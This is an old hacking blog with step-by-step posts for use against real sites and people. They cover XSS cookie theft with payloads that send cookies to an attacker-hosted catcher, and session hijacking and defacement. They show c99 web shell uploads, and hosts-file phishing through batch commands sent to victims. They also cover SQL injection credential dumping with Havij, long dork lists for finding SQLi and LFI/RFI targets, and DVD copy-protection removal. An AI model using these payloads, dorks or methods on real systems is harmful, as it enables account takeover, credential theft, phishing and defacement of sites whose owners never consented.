Thursday, 6 October 2011

How to change the processor name




Hello friends  .......today i gonna show you that how can you change your processor name with the help of the registry editor.....

Steps - Open the notepad ....and type the following bold and underlined text....and save it as ....anyfilename.reg

here please check the extention to .reg file .......


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"Component Information"=hex:00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00
"Identifier"="x86 Family 15 Model 1 Stepping 3"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="              AMD(R) ATHLON 64 BIT FX  8.70GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:00073fff
"~MHz"=dword:000006a3
"Update Signature"=hex:00,00,00,00,04,00,00,00
"Update Status"=dword:00000002









thanks/.....for reading this .....

Sunday, 17 July 2011

XSS Tutorial








 








Hello Guys Today i will write a Complete Tutorial on XSS.

First Of All XSS is in 2 Types, Persistent and Non-Persistent type.

For XSS we will use something called a Cookie Catcher.
Question will be that why we would need someones else cookies?

The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking.

First go to a free hosting site like http://www.110mb.com or any other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/1I5oz

What does the cookie catcher do?
It grabs the user's:
  • Cookies
  • IP
  • Referral Link. Which Page is attached to that Link
  • Time And Date

Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
http://adf.ly/Tdo3

Now for testing If a site is vulnerable or not you can add these codes:

Code:
"><script>alert(document.cookie)</script>

Code:
'><script>alert(document.cookie)</script>

Code:
"><script>alert("Test")</script>

Code:
'><script>alert("Test")</script>

Or a new one which i found out myself in which you can inject HTML:

Code:
"><body bgcolor="FF0000"></body>

Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup like this:


Or if you used my testing and you saw the page's background go black or a page of google opens in that site it means its vulnerable to XSS attack.

In the end, if your site is http://www.example.com
The link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>

Persistent XSS:

In this method we will grab the slave's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: http://adf.ly/1I6ns
Now test and see if the XSS vulnerable test work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type or submit it, add this:

Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you.

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: http://www.example.com/cookie catcher.php
The container of the cookies would be: http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!

Now there is another way for a cookie grabbing drive by, add this code and post it:

Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>

Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more Smile

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.

Non-Persistent XSS:

Ok in this method we will make the slave admin go to our link. First we will pick a XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:

Code:
<script>alert(document.cookie)</script>

And click the search button. If you see a javascript popup means its vulnerable to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/1I6ns
Now in front of the search.php?search= add this:

Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to http://www.spam.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vulnerable website and send a Fake Mail from a online fake mailer like this one: http://adf.ly/1I73J

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the spam will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.

Session Hijacking:

Ok now you have the Admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note open Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vulnerable website and clear the link. Instead of that link add this:

Code:
Javascript:void(document.cookie="")

or for an example:

Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And you are logged in as administrator.
So now go in your Admin Panel and upload your Deface Page.

Good Luck. Now you have Hacked a Website with XSS.

High Compression 4GB DVD to 100MB File







  Install all the Softwares (Download them...all are freewares)……….
1) DivX Create Bundle
2) DVD2AVI
3) DVD Decrypter
4) LAME ACM Codec
5) Virtual Dub

 

Step (1): Insert your DVD into the drive and launch DVD decrypter. DVD Decrypter will detect the DVD and its file contents will now be displayed in the right pane. Now go to File > Browse and select the destination for the ripped VOB files. Keep in mind that the destination must have enough free space to store the contents of the entire DVD.

Step (2): After choosing the destination, click on File>Decrypt to start the decryption process. DVD Decrypter removes the Macrovision Protection by default, and you can set to remove region code as well by going to Tools > IFO > Region > Patch > Region Free. These are necessary for the next step. After the DVD ripping process is completed, close DVD Decrypter.

Step (3): Next Launch DVD2AVI. Go to File > Open. Make sure the correct track number in the Audio menu is selected. You need to find the correct track number-most DVDs have multiple audio tracks in different languages. This can be checked by selecting one track at a time and playing it. Also click on the Audio menu and navigate to “48>44.1KHz”, and select Off. Go to Help > SIMD Technology and select all the optimizations supported by your processor. Now go to File > Save As AVI.

Step (4): Decide on a file name and choose a location with enough free space. You will now be prompted to choose a video compressor. Choose “DivX 6.x.x” from the drop-down menu where you can select the video compressor.

Step (5): Under the Certification Profiles, you can choose an appropriate preset profile such as High Definition, Home Theatre, Portable, Handheld, and Unconstrained. When you choose one of the above profiles, it is virtually guaranteed that the encoded DivX file will be playable on any standalone DivX-certified player. Click on Settings. You can select a bitrate of your choice. A higher bitrate means a larger file size and better quality, while a lower bitrate means a smaller file size and lower image quality.

Step (6): In the Codec tab, you can set the Encoding mode. The default setting is a good trade-off between quality and compression, but if you wish to control the file size, you can state your own mode such as High Performance, Better Quality, etc. Click on OK and then on save to start the video
demultiplexing process. This will take some time depending on the speed of your computer. At the end of this process, you’ll have an AVI file and a WAV file.

Step (7): We now get to the creation of the DivX file-putting together the video (AVI) and audio (WAV) files that were created in the previous step. Launch Virtual Dub. Under File > Open, browse to the folder where the AVI and WAV files are stored. Select the AVI file and click Open.

Step (8): Click on the Audio menu and click “Full Processing Mode”. Click again on the Audio menu and select “WAV Audio”. You will be prompted to open a WAV file. Select the WAV file you created earlier and click Open. Click on the Audio menu and then on Compression. Select “MPEG Layer-3” from the left pane and then select “128 KBit/s, 48,000Hz, Streo” in the right pane. Click OK.

Step (9): Select Interleaving from the Audio menu. Then, select the “mis” radio button and input “500” into the “Interleave audio every” dialog box. Click OK. Again, in the Audio menu, select Volume. Check the box and move the slider to 200 percent. Click OK.

Step (10): From the Video menu, select Direct Stream Copy.

Step (11): Go to File > Save As. Enter a file name of your choice at a location of your choice, and click at a location of your choice, and click OK. This, again, will take some time, but not as much as the video encoding using DVD2AVI. After the process is complete, you’ll have a DivX backup of ypur DVD movie.
Step (12): All that’s left now is to burn the DivX backup up to CD or DVD using your DVD-Writer.



Wednesday, 1 June 2011

Shell Uploading


What is Shell ?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )
I am not going to explain SQLi just how to deface.
Sql Tut- http://hackingmania.com/Blog/sql-injection-and-defacement-for-beginners-tutorial
So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.
Now login to the admin page with the admin details you got.
Go through the admin page until you find a place where you can upload a picture (Usually a picture).
Now you have to upload the shell. Right if you don’t get an error it is all good.
Now to find the shell
Go through the site until you find any image and if you are using firefox Right
- Click on it and “Copy Image Location”
Make a new tab and paste it there.
It will probably look something like this:
http://www.example.com/images/photonamehere.jpg
So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)
Now a page will come up looking like this:

Does probably not look like that but will look similar.
Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.
Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.
Keep in mind:
• Change Admin Username and Password
•The people have FTP access so you need to change that Password too .
•Always use a Proxy or VPN

Desktop Phishing Hack


It is an advance form of phishing. Kindly read my previous post on normal phishing before proceeding.Difference between phishing and desktop phishing is as follows.

In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.


What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.
Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.






Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.

Saturday, 5 March 2011

SQL Injection in Easy steps......!!!!!!

[SQL] HACK SITES USING Havij v1.14


it is simple tut how to use havij to hack sites Smile

Download Havij v1.14 


1.First Find a sqli infected site

2-Open havij and copy and paste infected link as shown in figure

3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx


4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed



5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure




6. In that Just put mark username and password and click "Get data"




8. Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure..



*************************************************************************
HOW TO FInD SQL VU SITES
GO HERE 

Quote:http://lnk.co/GP51L

THE GREEN COLLOUR MEAN there is SQL Injection Vulnerability

like this in the pic





SQL Dorks

Code:
Aqui les dejo unas cuantas Dorks para buscar webs vulnerables:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:rtray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurlinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:roduit.php?id=
inurlp.php?id=
inurl:shopping.php?id=
inurl:roductdetail.php?id=
inurlst.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=


Friday, 25 February 2011

Advance Dorks For LFI & RFI

Remote File Inclusion/Local File Inclusion:
inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.ru

allinurl:/index.php?file= site:*.ru

All INURL :


/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

LFI :
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More